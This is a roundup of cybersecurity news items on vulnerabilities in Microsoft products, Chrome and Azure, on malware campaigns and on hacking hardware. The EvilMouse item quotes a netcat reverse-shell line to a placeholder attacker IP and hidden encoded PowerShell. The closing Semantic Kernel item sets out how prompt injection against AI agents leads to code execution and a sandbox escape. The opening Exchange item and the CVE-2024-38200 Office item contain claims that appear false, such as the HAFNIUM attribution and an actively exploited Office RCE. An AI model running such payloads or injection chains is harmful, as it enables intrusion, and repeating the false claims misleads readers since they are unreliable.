Critical Zero-Day Exploit in Progress: Microsoft Confirms Active Attacks on Exchange Servers Microsoft has issued an urgent warning about a zero-day vulnerability (CVE-2024-21410) actively exploited in targeted attacks against on-premises Microsoft Exchange Servers. The flaw, classified as a privilege escalation vulnerability, allows threat actors to gain SYSTEM-level access the highest privilege level on compromised servers. Key Details: - Who: Microsoft’s Security Response Center (MSRC) and cybersecurity firm Trend Micro identified the attacks, attributing them to a Chinese state-sponsored group tracked as HAFNIUM, previously linked to the 2021 Exchange Server breaches. - What: The vulnerability enables attackers to bypass authentication and execute arbitrary code remotely. Successful exploitation could lead to data theft, lateral movement within networks, or deployment of ransomware. - When: Attacks were first detected in early January 2024, with Microsoft confirming exploitation in the wild on February 13, 2024. A patch was released as part of February’s Patch Tuesday updates. - Where: Targets include U.S. and European organizations, particularly in government, defense, and critical infrastructure sectors. Unpatched Exchange Servers (versions 2013, 2016, and 2019) are at risk. - Why: The campaign appears espionage-driven, with attackers exfiltrating emails and sensitive documents. Microsoft noted the group’s use of custom malware to maintain persistence. Impact: - Over 220,000 Exchange Servers remain unpatched globally, per Shodan scans, leaving them exposed. - The flaw is chained with other exploits to maximize damage, including CVE-2024-21413, a separate Exchange Server vulnerability patched in the same update. - Organizations running hybrid Exchange environments (on-premises + cloud) are advised to prioritize patching, as attackers may pivot to cloud resources post-compromise. Microsoft’s advisory urges immediate patching, though no workaround exists for the flaw. The incident underscores the persistent targeting of Exchange Servers by advanced threat actors.

Microsoft Releases Emergency Patch for Critical RRAS Vulnerabilities in Windows 11 On March 13, 2026, Microsoft issued an out-of-band security update to address three critical remote code execution (RCE) vulnerabilities in the Windows Routing and Remote Access Service (RRAS) management tool. The flaws, tracked as CVE-2026-25172, CVE-2026-25173, and CVE-2026-26111, affect enterprise networks relying on RRAS for routing, VPN services, and secure remote connectivity. The vulnerabilities could be exploited if a user connects to a malicious remote server, allowing attackers to execute arbitrary code, install malware, or gain unauthorized access to sensitive data. Successful exploitation may also enable deeper network intrusion, posing significant risks to organizations handling confidential traffic. To mitigate the threat, Microsoft released hotpatch KB5084597, which applies fixes without requiring a system reboot, minimizing disruption for enterprise environments. The update is available for Windows 11 versions 25H2 (OS Build 26200.7982) and 24H2 (OS Build 26100.7982) and is automatically deployed to systems configured for hotpatch-enabled updates. Standard Windows Update users will receive the fix through the regular update pipeline. Microsoft confirmed no known issues with the patch at release and included the latest Servicing Stack Update (SSU) to ensure update reliability. The rapid deployment underscores the urgency of addressing RRAS vulnerabilities, particularly in high-risk enterprise environments.

Microsoft Patches Critical .NET Framework DoS Vulnerability (CVE-2026-26127) Microsoft has released an emergency security update to address a newly disclosed vulnerability in the .NET Framework, tracked as CVE-2026-26127, which could allow unauthenticated remote attackers to trigger a Denial-of-Service (DoS) condition. With a CVSS score of 7.5, Microsoft rates the flaw as "Important" due to its potential to crash affected systems. The vulnerability stems from an out-of-bounds read weakness (CWE-125), where improper memory handling in .NET applications enables attackers to send specially crafted network requests, causing crashes without requiring user interaction or elevated privileges. While Microsoft assesses exploitation as "Unlikely" due to low attack complexity, the public disclosure of technical details raises concerns that threat actors may develop exploits. Currently, there is no evidence of active exploitation or publicly available exploit code. ### Affected Systems The vulnerability impacts: - .NET 9.0 (Windows, macOS, Linux) - .NET 10.0 (Windows, macOS, Linux) - Microsoft.Bcl.Memory 9.0 & 10.0 (NuGet packages) ### Mitigation & Patches Microsoft has released fixes for all affected versions: - .NET 9.0 → Upgrade to 9.0.14 - .NET 10.0 → Upgrade to 10.0.4 - Microsoft.Bcl.Memory → Update to 9.0.14 or 10.0.4 via NuGet Administrators are advised to apply patches immediately to prevent potential service disruptions. While exploitation risk remains low, monitoring system logs for unusual crashes or network activity is recommended.

Microsoft Patches Zero-Day .NET Vulnerability (CVE-2026-26127) in March 2026 Updates Microsoft has resolved a zero-day vulnerability in the .NET framework (CVE-2026-26127) that could enable attackers to remotely crash applications and trigger denial-of-service (DoS) disruptions. The flaw was addressed in the company’s March 2026 Patch Tuesday security updates. The vulnerability affects .NET 9.0 and .NET 10.0 applications across Windows, macOS, and Linux systems. While it does not permit remote code execution, repeated exploitation could lead to sustained service outages by forcing vulnerable applications to crash. Key Details: - CVE ID: CVE-2026-26127 - CVSS Score: 7.5 (Important) - Weakness Type: Out-of-bounds read (CWE-125) - Attack Vector: Network-based, no authentication required - Affected Products: .NET 9.0 and .NET 10.0 The flaw stems from improper bounds checking in the .NET runtime and Microsoft.Bcl.Memory library when processing malformed Base64Url input. The vulnerability was publicly disclosed before a patch was available, classifying it as a zero-day. However, Microsoft reported no evidence of active exploitation at the time of the fix. Impact: Exploitation could disrupt web applications, APIs, cloud platforms, enterprise services, and CI/CD pipelines. While the flaw does not allow data theft or code execution, repeated crashes may result in extended downtime, financial losses, and operational instability. Security researchers note that forced restarts could also introduce secondary risks to infrastructure. Microsoft’s patch mitigates the issue, and affected organizations are advised to update their .NET runtimes to the latest versions. Additional recommendations include monitoring for abnormal Base64Url requests and implementing rate limiting to mitigate automated DoS attempts.

Microsoft Discloses Critical Office Vulnerability (CVE-2026-26110) with High Severity Risk On March 10, 2026, Microsoft revealed a critical security flaw in Microsoft Office, tracked as CVE-2026-26110, with a CVSS score of 8.4, classifying it as a high-severity vulnerability. The issue stems from a type confusion weakness (CWE-843), where improper handling of object types in memory could allow attackers to execute arbitrary code on affected systems. The vulnerability enables remote code execution (RCE) despite being classified as a local attack vector (AV:L) in CVSS metrics. Exploitation requires malicious content to be processed by a targeted system, granting attackers the same privileges as the logged-in user. Notably, the Office Preview Pane can serve as an attack vector meaning simply previewing a crafted file could trigger the exploit without user interaction. While Microsoft assesses exploitation as "less likely" and reports no active attacks or public exploit code, successful exploitation could lead to malware deployment, data theft, or full system compromise. The flaw affects confidentiality, integrity, and availability, all rated as high-impact in CVSS scoring. Microsoft has released security updates to patch the vulnerability and recommends immediate installation. Additional mitigations include disabling automatic document previews, user education on phishing risks, and deploying endpoint protection tools. The flaw was responsibly disclosed by an anonymous researcher. The incident underscores the growing threat to widely used productivity software and the need for timely patching in enterprise environments.

Microsoft Discloses Critical SQL Server Zero-Day Vulnerability (CVE-2026-21262) Microsoft has revealed a critical zero-day vulnerability in SQL Server, tracked as CVE-2026-21262, which allows authenticated attackers to escalate privileges to sysadmin the highest administrative level on affected systems. The flaw, disclosed on March 10, 2026, stems from improper access control (CWE-284) and has been publicly exposed, increasing the risk of exploitation. With a CVSS score of 8.8 (Important severity), the vulnerability is network-based, requires low privileges, and involves no user interaction. Successful exploitation grants attackers full control over the database, compromising confidentiality, integrity, and availability all rated as high impact. While Microsoft assesses exploitation as "Less Likely" at present, the public disclosure lowers the barrier for threat actors to develop exploits. The flaw affects SQL Server 2016 through 2025, including instances hosted on Azure IaaS. Microsoft has released patches for all supported versions, with specific KB updates for each release (e.g., KB5077466 for SQL Server 2025, KB5077464 for SQL Server 2022). Organizations are advised to apply updates immediately, audit user permissions, and monitor for suspicious privilege escalation activity. Unsupported versions should be upgraded to receive security fixes.

Microsoft Patches High-Severity Active Directory Vulnerability (CVE-2026-25177) Microsoft released a security update on March 10, 2026, addressing a high-severity vulnerability (CVE-2026-25177) in Active Directory Domain Services (AD DS) that could allow attackers to escalate privileges and gain full control of affected Windows systems. The flaw, rated 8.8 on the CVSS v3.1 scale, stems from improper validation of resource names, enabling authenticated attackers with low privileges to manipulate the system and obtain SYSTEM-level access the highest level of control within Windows. AD DS is a critical component of enterprise identity infrastructure, managing authentication, access policies, and user permissions. Exploitation of this vulnerability requires no user interaction, increasing the risk for organizations relying on Active Directory. Successful attacks could lead to data theft, credential compromise, malware installation, or disruption of authentication services, including interference with Kerberos processes. Security experts warn that attackers could leverage elevated permissions to move laterally across networks, targeting domain controllers and other critical systems a tactic commonly used in ransomware and advanced intrusion campaigns. Microsoft has classified the issue as "Important," but its potential impact on corporate environments is significant. The patch is included in Microsoft’s March 2026 Patch Tuesday updates, and organizations are urged to apply it immediately to domain controllers and AD DS-enabled systems. Additional mitigation measures include log monitoring for privilege escalation attempts, enforcing least-privilege access, and deploying EDR tools for detection if patching is delayed. Given Active Directory’s central role in enterprise security, vulnerabilities in this system remain a high priority for threat actors.

Microsoft Silently Patches Critical Azure AKS Privilege Escalation Flaw After Disputing Researcher’s Report Security researcher Justin O’Leary disclosed a critical privilege escalation vulnerability in Microsoft Azure Backup for AKS, which allowed attackers with the low-privileged "Backup Contributor" role to gain cluster-admin access without any prior Kubernetes permissions. The flaw, discovered in March 2026, was reported to Microsoft on March 17, but the company rejected it on April 13, arguing the issue required pre-existing administrative access a claim O’Leary called "factually incorrect." Microsoft’s Security Response Center (MSRC) further dismissed the report as "AI-generated content" when escalating to MITRE for a CVE assignment, despite the researcher’s technical evidence. The CERT Coordination Center (CERT/CC) independently validated the vulnerability on April 16, assigning it VU#284781 and scheduling public disclosure for June 1, 2026. However, Microsoft intervened on May 4, convincing MITRE to block the CVE, citing the same disputed pre-existing access requirement. Under CNA (CVE Numbering Authority) hierarchy rules, Microsoft itself a CNA retained final authority, and the case was closed without a CVE. ### How the Attack Worked The vulnerability stemmed from Azure Backup for AKS’s Trusted Access mechanism, which automatically granted cluster-admin privileges to backup extensions. An attacker with only Backup Contributor permissions on a backup vault could enable backup on a target AKS cluster, triggering Azure to configure Trusted Access with full admin rights. This allowed the attacker to extract secrets or restore malicious workloads into the cluster. O’Leary classified it as a Confused Deputy vulnerability (CWE-441), where Azure and Kubernetes RBAC trust boundaries were improperly enforced. ### Microsoft Denies Patch, But Evidence Suggests Otherwise Microsoft maintained that the behavior was "expected" and that "no product changes were made." However, O’Leary observed that the original exploit path no longer works, with new error messages such as "UserErrorTrustedAccessGatewayReturnedForbidden" indicating that Trusted Access must now be manually configured before enabling backups. Additional permission checks were also introduced, requiring the vault’s Managed Identity (MSI) to have Reader access on the AKS cluster and snapshot resource group, while the AKS cluster MSI now needs Contributor permissions on the snapshot resource group. ### Impact and Lack of Transparency Without a CVE or public advisory, organizations that granted Backup Contributor permissions between an unknown start date and May 2026 remain unaware of their exposure. The silent patch leaves defenders without a clear remediation timeline or visibility into the risk window, raising concerns about vendor accountability in vulnerability disclosure. The case underscores ongoing tensions between researchers and major vendors over severity assessments, CVE assignments, and disclosure practices, particularly as AI-assisted reports strain bug bounty programs. Microsoft has not issued any official guidance on the fix, leaving affected users without formal notification.

Microsoft Warns of Malicious Next.js Repositories Targeting Developers Microsoft has uncovered a sophisticated campaign where threat actors weaponize malicious Next.js repositories to compromise developers by disguising them as legitimate projects or technical assessments. The attack leverages Visual Studio Code and Node.js workflows to deploy a staged command-and-control (C2) backdoor without traditional malware installers. The campaign was detected after suspicious outbound connections from Node.js processes to attacker-controlled infrastructure over HTTP port 3000 were observed beaconing at short intervals. Microsoft Defender Experts traced the activity to Bitbucket-hosted repositories, including one framed as a recruiting assessment and another labeled Cryptan-Platform-MVP1. Additional repositories sharing naming patterns like JP-soccer, RoyalJapan, and SettleMint along with variant labels such as v1, master, and demo were identified as part of the same malicious family. The attack employs three execution paths: 1. Workspace Automation Abuse – Malicious `.vscode/tasks.json` files trigger Node.js tasks upon project opening, fetching a loader script from Vercel-hosted endpoints like price-oracle-v2.vercel.app. 2. Build-Time Execution – Trojanized assets (e.g., jquery.min.js) decode base64-encoded URLs during `npm run dev`, pulling and executing payloads in memory. 3. Server Startup Exploitation – Backend routes and `.env` variables (e.g., `AUTH_API`) decode attacker endpoints, exfiltrate environment variables, and execute remote JavaScript, exposing cloud keys and credentials. All paths converge on a Stage 1 script that registers the compromised host, polls a C2 endpoint, and maintains persistence via a durable `instanceId`. Stage 2 upgrades this foothold into a long-lived controller, executing tasks through detached Node interpreters, browsing directories, and exfiltrating files via endpoints like `/api/hsocketNext` and `/upload`. Microsoft recommends hardening developer workflows by enabling Visual Studio Code Workspace Trust, restricting automation file execution, and applying attack surface reduction rules in Defender for Endpoint. Detection strategies include monitoring Node.js outbound connections to Vercel domains and C2 paths like `/api/errorMessage`. Organizations using Microsoft Sentinel can operationalize these behaviors into hunting queries to identify similar threats.

Google Patches Actively Exploited Chrome Zero-Day (CVE-2026-2441) On February 16, 2026, Google released an emergency security update to address CVE-2026-2441, a high-severity zero-day vulnerability in Chrome actively exploited in the wild. The flaw, classified as a use-after-free bug in the browser’s CSS component, allows remote attackers to execute arbitrary code within a sandbox via a maliciously crafted HTML page. The vulnerability was discovered and reported by security researcher Shaheen Fazim on February 11, 2026. While Google confirmed the existence of an exploit, details about the threat actor or attack methods remain undisclosed. This marks the first actively exploited Chrome zero-day of 2026, following eight similar vulnerabilities patched in 2025. The update (Chrome 145.0.7632.75/76 for Windows and Mac, 144.0.7559.75 for Linux) is rolling out globally over the coming days. Users of Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are advised to apply updates as they become available. The flaw’s severity underscores the ongoing risk of browser-based attacks, particularly those leveraging memory corruption vulnerabilities. No additional technical or attribution details have been released.

Critical SQL Injection Flaw in Microsoft Configuration Manager Under Active Exploitation The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2024-43468, a severe SQL injection vulnerability in Microsoft Configuration Manager, to its Known Exploited Vulnerabilities (KEV) catalogue, signaling an immediate threat to organizations using the enterprise management platform. The flaw allows unauthenticated remote attackers to execute arbitrary commands on vulnerable servers by sending maliciously crafted requests. Exploitation does not require authentication, enabling threat actors to manipulate databases, extract sensitive data, alter system settings, or move laterally within compromised networks. Given Configuration Manager’s privileged access to thousands of endpoints, a successful attack could grant extensive control over corporate IT infrastructure. CISA’s February 12, 2026 advisory mandates federal agencies to apply mitigations by March 5, 2026, per Binding Operational Directive 22-01. Cloud-based deployments must adhere to BOD 22-01 cloud service guidelines, while organizations unable to patch should discontinue use until fixes are available. Microsoft has released security updates to address the vulnerability. While CISA has not confirmed ransomware-related exploitation, the flaw’s characteristics align with tactics used in initial access operations that often precede ransomware attacks. Security teams are advised to monitor for suspicious SQL queries, unusual database activity, or unauthorized command execution. The active exploitation of this vulnerability underscores the urgency of patching, as enterprise management platforms remain prime targets for establishing persistent network footholds.

EvilMouse: A $44 USB Mouse That Silently Hijacks Systems Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures. Unlike suspicious USB drives, EvilMouse retains normal mouse functionality optical tracking and buttons while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds. The device executes DuckyScript-like sequences, including: - Hidden PowerShell commands (`-WindowStyle Hidden -enc`) - Base64-encoded payloads for obfuscation - Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`) - Persistence mechanisms (e.g., scheduled tasks) In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma. Security Implications EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments. Potential Defenses - USB device whitelisting (Group Policy) - Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring) - Physical port controls (Kensington locks) The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses. EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.

Microsoft Warns of Actively Exploited Zero-Day in Windows Shell (CVE-2026-21510) Microsoft has issued an urgent security alert for a high-severity zero-day vulnerability (CVE-2026-21510) in the Windows Shell, currently under active exploitation. The flaw, rated 8.8 on the CVSS scale, allows attackers to bypass critical security features, including SmartScreen and user prompts, enabling malicious code execution without warnings. The vulnerability stems from a flaw in how the Windows Shell processes certain file metadata, allowing attackers to craft deceptive shortcuts (LNK files) or phishing links that appear legitimate. When opened, these files execute malicious payloads with the same trust level as local files, evading the "Mark of the Web" safeguard designed to flag downloaded content. Affected systems include nearly all supported Windows versions Windows 10 and 11 (21H2 through 25H2), as well as Windows Server 2012, 2016, 2019, 2022, and 2025. Microsoft credits the discovery to its Threat Intelligence Center (MSTIC) and Google’s Threat Intelligence Group. Patches were released in the February 2026 Security Updates (e.g., KB5077179 for Windows 11, KB5075912 for Windows 10), with Microsoft urging immediate deployment to mitigate ongoing attacks. Until applied, users are advised to exercise caution with untrusted shortcuts and links.

Critical Zero-Day Flaw in MSHTML Framework Exploited in the Wild On February 10, 2026, Microsoft disclosed a high-severity zero-day vulnerability in the MSHTML Framework, tracked as CVE-2026-21513, which is actively being exploited. The flaw, classified as a security feature bypass (CWE-693), allows attackers to remotely circumvent critical protections in Windows systems. The vulnerability affects users of Internet Explorer mode in Microsoft Edge and legacy applications that rely on MSHTML for rendering web content. Attackers can exploit it by luring victims into visiting a malicious website or opening a rigged document requiring only a single click. Once triggered, the flaw bypasses defenses like SmartScreen filters and zone protections, granting full system control to the attacker. Microsoft’s Exploitability Index confirms real-world attacks are underway, with a CVSS score of 8.8 (High) due to its low complexity, network-based attack vector, and impact on confidentiality, integrity, and availability. The company has released a patch via Windows Update, which does not require a system reboot for most users. Enterprises with legacy dependencies on MSHTML particularly those still using apps incompatible with modern Chromium-based Edge are at heightened risk. The flaw has been linked to nation-state threat actors, underscoring the urgency of patching. Microsoft has rated the vulnerability as "Important" and recommends disabling Internet Explorer mode unless absolutely necessary, along with auditing applications for MSHTML reliance. The incident highlights the persistent risks of outdated frameworks in enterprise environments.

Microsoft Patches Actively Exploited Zero-Day in Windows Desktop Window Manager On February 10, 2026, Microsoft released an emergency patch for CVE-2026-21519, a zero-day elevation of privilege vulnerability in the Desktop Window Manager (DWM) a core Windows component handling visual effects, animations, and the Aero interface since Windows Vista. The flaw, classified as a type confusion bug (CWE-843), allows attackers with low-level local access to escalate privileges to full system control. Microsoft confirmed active exploitation in the wild, marking the vulnerability as "Exploitation Detected" a rare and urgent designation. While no public proof-of-concept exists, real-world attacks indicate threat actors are already leveraging the flaw. The vulnerability carries a CVSS score of 7.8 (High), though Microsoft rated it "Important" rather than "Critical" due to its requirement for local access and unchanged attack scope. Exploitation begins with a foothold such as malware delivered via phishing granting standard user rights. Attackers then manipulate DWM’s memory handling, bypassing security checks to gain full read/write/execute privileges. From there, they can deploy backdoors, exfiltrate data, or move laterally within a network. The flaw affects Windows 10 and 11, posing risks to enterprises, gamers, and everyday users, particularly in ransomware or espionage campaigns. Microsoft’s February 2026 updates address the issue, with additional mitigations including Defender tamper protection and monitoring for unusual dwm.exe crashes or privilege escalation attempts. The incident underscores vulnerabilities in Windows’ graphics stack, where DWM’s complexity comparable to a video game engine continues to present security challenges. Further details are expected in Microsoft’s MSRC blog.

Critical Zero-Day Exploit in Progress: Microsoft Confirms Active Attacks on Office Flaw Microsoft has issued an urgent warning about a zero-day vulnerability (CVE-2024-38200) in its Office suite, currently being exploited in targeted attacks. The flaw, discovered by security researchers at Morphisec, allows threat actors to execute arbitrary code on vulnerable systems by tricking users into opening malicious documents. Key Details: - Who: Microsoft Office users, particularly those running unpatched versions of Office 2016, 2019, and 2021, as well as Microsoft 365 Apps for Enterprise. - What: A remote code execution (RCE) vulnerability in the MSHTML (Trident) engine, enabling attackers to bypass security controls via specially crafted files. - When: Exploits were first detected in late July 2024, with Microsoft confirming active attacks in the wild as of August 12, 2024. - Where: Attacks have been observed globally, with initial reports pointing to Europe and North America as primary targets. - Why: The flaw is being leveraged for espionage and data theft, with early evidence suggesting state-sponsored actors may be involved. Microsoft has released out-of-band security updates to address the vulnerability, urging users to apply patches immediately. The company also recommends enabling Protected View and Attack Surface Reduction (ASR) rules as temporary mitigations. No public proof-of-concept (PoC) exploit has been released, but security firms warn that widespread exploitation is likely as details emerge. The incident underscores the growing risk of document-based attacks, which remain a favored vector for cybercriminals and advanced persistent threats (APTs). Organizations relying on Microsoft Office are advised to prioritize patching and monitor for unusual activity.

Microsoft Azure Portal Dependency Confusion Vulnerability Disputed by MSRC Despite RCE Evidence In January 2026, security researcher Wahid Fayad uncovered a dependency confusion vulnerability in Microsoft’s Azure Portal that could enable remote code execution (RCE). While analyzing JavaScript assets on portal.azure.com, Fayad identified a `require` statement referencing an internal NPM module, `@FxInternal/NetDiagnostics`, which did not exist in the public NPM registry. This left the namespace unclaimed and vulnerable to exploitation a technique popularized by researcher Alex Birsan in 2021. To test the flaw, Fayad registered the `@fxinternal` namespace and published a placeholder package with an out-of-band (OOB) HTTP callback payload. Within hours, the callback executed from Microsoft’s infrastructure (AS8075), confirming RCE. The exfiltrated data included internal hostnames, usernames, and node_modules paths, all tied to Microsoft’s development or pipeline environments. Fayad reported the issue to Microsoft’s Security Response Center (MSRC) on January 28, 2026, providing logs showing Azure backend requests validating the package’s execution. Despite this evidence, MSRC closed the case on March 24, asserting the callback originated from "automated security tooling" rather than production systems. After appeals, MSRC maintained the package was "always loaded from an internal source," dismissing the risk of injection. However, the incident triggered broader security concerns. Within a week, threat-intelligence platforms flagged `@fxinternal/netdiagnostics` as a supply-chain threat, and GitHub’s Advisory Database assigned it a 9.3 Critical severity rating (CWE-506: Embedded Malicious Code). The advisory validated the risk independently, regardless of Microsoft’s internal assessment. The case highlights ongoing friction between researchers and MSRC, echoing disputes from the Nightmare-Eclipse saga where six Windows zero-days were exploited in the wild before patches were issued. While Microsoft’s May 2026 security blog documented active dependency confusion attacks targeting NPM packages, the Azure Portal incident underscores the downstream risks: any external developer or CI/CD pipeline mirroring Azure’s assets could inadvertently pull malicious code from the public registry. Microsoft’s dismissal of the RCE evidence contrasts with third-party security systems treating the package as a high-severity threat, raising questions about vulnerability classification processes.

High-Severity Windows Admin Center Flaw Exposes Azure Tenants to Unauthorized Access A critical vulnerability in Windows Admin Center (WAC)’s Azure Single Sign-On (SSO) implementation tracked as CVE-2026-20965 has left Azure virtual machines (VMs) and Arc-connected systems vulnerable to tenant-wide unauthorized access. The flaw stems from improper token validation, effectively erasing security boundaries between individual machines and entire Azure environments. To exploit the vulnerability, an attacker requires: - Local admin privileges on a WAC-enabled Azure VM or Arc-connected machine. - A privileged user connecting via the Azure Portal. The issue highlights risks in identity and access management (IAM), where a single compromised system could grant attackers broad control over an organization’s Azure tenant. Microsoft has not yet disclosed remediation details, but affected organizations are advised to monitor for updates and assess potential exposure. The discovery underscores the growing threat of identity-based attacks in cloud environments, where misconfigured or flawed authentication mechanisms can lead to large-scale breaches. No active exploitation has been reported at this time.

Microsoft Patches Actively Exploited Zero-Day in Desktop Window Manager On January 13, 2026, Microsoft released a critical security update as part of its Patch Tuesday cycle to address a zero-day vulnerability in the Desktop Window Manager (DWM), tracked as CVE-2026-20805. The flaw, which had been exploited in the wild, enables low-privilege local attackers to disclose sensitive user-mode memory specifically section addresses via remote ALPC ports. The vulnerability poses a significant risk as it can be leveraged in privilege escalation attacks, particularly in post-compromise scenarios. Due to its low attack complexity and active exploitation, Microsoft urged organizations to prioritize patching, especially on legacy Windows systems. The update mitigates the threat, but the discovery underscores the ongoing targeting of Windows components in cyberattack chains. No additional details on the attackers or affected organizations were disclosed.

New CloudZ RAT Exploits Microsoft Phone Link to Steal OTPs and SMS Messages Security researchers at Cisco Talos have uncovered a sophisticated cyberespionage campaign leveraging CloudZ, a remote access trojan (RAT), and its custom Pheno plugin to intercept SMS messages and one-time passwords (OTPs) without direct access to victims’ phones. The attack exploits Microsoft Phone Link, a legitimate Windows application that mirrors phone notifications, messages, and call logs to a paired PC. Active since at least January 2026, the campaign targets users by hijacking the connection between a Windows machine and a linked smartphone. Instead of deploying malware on the phone itself, attackers abuse Phone Link’s synchronization feature to access sensitive data stored in its local SQLite database, including OTPs sent by banks and email providers. This allows threat actors to bypass two-factor authentication (2FA) without physical access to the device. The infection begins with a fake ScreenConnect update, which drops a .NET loader disguised as a system file. After bypassing security checks, the loader deploys CloudZ, a RAT designed to evade detection. The malware scans for analysis tools like Wireshark, Fiddler, and Sysmon, generates sensitive functions in memory, and uses timing-based evasion to avoid sandboxing. The Pheno plugin plays a critical role by identifying active Phone Link processes (e.g., YourPhone, PhoneExperienceHost) and confirming an active connection between the PC and phone. Once verified, CloudZ extracts synchronized SMS messages and OTPs from the PhoneExperiences-*.db database. To maintain persistence, CloudZ installs a scheduled task (SystemWindowsApis) running under the SYSTEM account and uses regasm.exe, a legitimate Windows utility, to execute payloads while blending in with normal system activity. Command-and-control (C2) communication is obfuscated by rotating user-agent strings and retrieving C2 addresses from Pastebin under the account HELLOHIALL, complicating network-based detection. Cisco Talos has released ClamAV signatures and Snort rules to detect the threat, along with indicators of compromise (IoCs) including the C2 server 185[.]196[.]10[.]136, attacker-controlled staging URLs, and malicious file paths. The campaign highlights risks associated with living-off-the-land binaries (LOLBins) and the abuse of trusted applications for data exfiltration.

Critical Vulnerabilities in Microsoft’s Semantic Kernel Expose AI Agents to Remote Code Execution Security researchers have uncovered two severe vulnerabilities in Microsoft’s Semantic Kernel, a widely used open-source framework for building AI agents, that could allow attackers to achieve remote code execution (RCE) or arbitrary file writes via prompt injection. The flaws, tracked as CVE-2026-25592 and CVE-2026-26030, highlight systemic risks in AI agent frameworks where untrusted input is mapped to system-level tools. ### The Threat Model: AI Agents as Execution Vectors Modern AI agents, powered by frameworks like Semantic Kernel, LangChain, and CrewAI, extend beyond text generation by integrating plugins that interact with files, databases, and scripts. While this enables powerful automation, it also introduces new attack surfaces. Unlike traditional AI vulnerabilities where risks were limited to content manipulation these flaws allow attackers to leverage prompt injection to execute arbitrary code on the host system. The AI model itself is not the issue; it functions as designed, translating natural language into structured tool calls. The vulnerability lies in how frameworks trust and process these tool invocations, turning prompt injection into a code execution primitive. --- ### CVE-2026-26030: RCE via In-Memory Vector Store Affected Versions: Semantic Kernel Python package < 1.39.4 Impact: Remote code execution on the host system #### Exploitation Mechanics 1. Attack Prerequisites: - The agent must use the Search Plugin backed by an In-Memory Vector Store with default configurations. - The attacker must have a prompt injection vector to manipulate the agent’s inputs. 2. Vulnerability Root Cause: - The framework’s default filter function for vector searches used unsafe string interpolation in Python’s `eval()`, allowing arbitrary code execution. - A blocklist-based validator intended to restrict dangerous operations was bypassed due to Python’s flexibility (e.g., alternate syntax, class hierarchy traversal). 3. Exploit Chain: - An attacker crafts a malicious prompt (e.g., `‘ or MALICIOUS_CODE or ‘`) to escape the intended filter logic. - The payload traverses Python’s class hierarchy to dynamically load the `os` module and execute shell commands (e.g., `calc.exe`). - The exploit bypasses the blocklist by: - Using unblocked attributes (`__name__`, `load_module`, `system`). - Structuring the payload as a valid lambda expression. - Avoiding direct use of blocked built-ins (e.g., `eval`, `exec`). 4. Mitigation: - Microsoft patched the flaw in v1.39.4 with a four-layer defense: - AST node-type allowlist (permitting only safe constructs). - Function call allowlist (restricting invocable functions). - Dangerous attributes blocklist (blocking class traversal). - Name node restriction (limiting identifiers to the lambda parameter). --- ### CVE-2026-25592: Arbitrary File Write via SessionsPythonPlugin Affected Versions: Semantic Kernel .NET SDK < 1.71.0 Impact: Sandbox escape, arbitrary file write, and RCE #### Exploitation Mechanics 1. Vulnerability Root Cause: - The `.NET SDK`’s `DownloadFileAsync` function was accidentally exposed to the AI model via the `[KernelFunction]` attribute. - The function lacked path validation, allowing attackers to specify arbitrary host filesystem locations (e.g., `Windows\Start Menu\Programs\Startup`). 2. Attack Chain: - Step 1: The attacker uses prompt injection to instruct the agent to generate a malicious script inside an isolated Azure Container Apps sandbox. - Step 2: A second prompt triggers `DownloadFileAsync` to write the script to the host’s Startup folder. - Step 3: On next login, the script executes, achieving full host compromise. 3. Mitigation: - Microsoft removed the `[KernelFunction]` attribute, revoking AI model access to `DownloadFileAsync`. - Added path validation (`ValidateLocalPathForDownload()`) to restrict writes to permitted directories. --- ### Detection and Response #### Affected Systems - CVE-2026-26030: Agents using Semantic Kernel Python < 1.39.4 with In-Memory Vector Store and default Search Plugin configurations. - CVE-2026-25592: Agents using Semantic Kernel .NET SDK < 1.71.0. #### Remediation - Upgrade immediately to Python v1.39.4+ or .NET SDK v1.71.0+. - Investigate potential exploitation by hunting for: - Suspicious child processes spawned by the agent (e.g., `cmd.exe`, `powershell.exe`). - File writes to sensitive directories (e.g., Startup folders). - Outbound connections from the agent host process. #### Key Takeaways - AI models are not security boundaries. Tools exposed to the model define the attacker’s scope. - Prompt injection risks escalate when agents interact with system-level tools (e.g., file operations, code execution). - Defense in depth is critical: Combine AI-level guardrails (intent detection) with host-level monitoring (endpoint telemetry). The vulnerabilities underscore the need for secure-by-design agent architectures, where untrusted input is treated as attacker-controlled when mapped to high-risk operations. Further research will explore similar flaws in other AI agent frameworks.

